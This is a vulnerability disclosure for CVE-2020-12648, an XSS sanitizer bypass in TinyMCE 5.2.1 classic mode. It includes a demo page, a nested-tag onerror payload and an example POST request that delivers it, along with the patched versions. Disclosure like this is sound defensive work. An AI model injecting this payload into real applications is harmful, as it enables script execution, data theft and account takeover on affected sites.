The following document describes an identified vulnerability in the TinyMCE application in version 5.2.1. TinyMCE is in use on thousands of websites, but the risk and impact of this vulnerability on those sites depend on the details of the application in which TinyMCE is used. The use of "classic" editing mode, existing XSS protections, and whether users can control the initial content inside the editor all affect the exploitability of this vulnerability.
Applications that use the TinyMCE text editor and do not implement additional XSS protections such as a strict content security policy (CSP) may be vulnerable to XSS. The exploitability and impact of this vulnerability are specific to the deployed application, but could result in sensitive information disclosure, privilege escalation, and account takeover.
Tiny Technologies, Inc.
|TinyMCE||5.2.1 and earlier|
One vulnerability was identified within the TinyMCE application:
Update to version 4.9.11 or 5.4.1
This vulnerability is described in the section below.
|CVE-2020-12648||High||Escalation of privileges, Information Disclosure, Other (context-dependent)||Remote|
An XSS vulnerability is present in TinyMCE version 5.2.1. When implemented in classic editing mode, the stripping and sanitization logic of TinyMCE can be bypassed using nested and non-terminated HTML tags, which can allow an attacker to inject an
tag with arbitrary
values, resulting in XSS.
To demonstrate the vulnerability, an HTML page was created with an instance of the TinyMCE editor, based on the official TinyMCE Quick Start Guide, as shown below:
<meta name="viewport" content="width=device-width, initial-scale=1">
<script src="https://cdn.tiny.cloud/1/no-api-key/tinymce/5/tinymce.min.js" referrerpolicy="origin"></script>
<h1>TinyMCE Quick Start Guide</h1>
<textarea name="mytextarea" index="mytextarea">
<?php echo htmlspecialchars($_POST['mytextarea']) ?>
<input type="submit" value="submit">
This example used PHP to supply user-controlled content to TinyMCE for rendering on page load. The payload could also be supplied directly through the TinyMCE
XSS was achieved using the following payload as user-supplied content:
<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">
An example request is shown below:
POST /tinymce.php HTTP/1.1
…omitted for brevity…
mytextarea=<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">
After the page loaded, the payload executed:
This vulnerability was also discovered in TinyMCE version 4.0.26. The impact of this vulnerability depends on the details of the application in which TinyMCE is used.
The patched versions are 4.9.11 and 5.4.1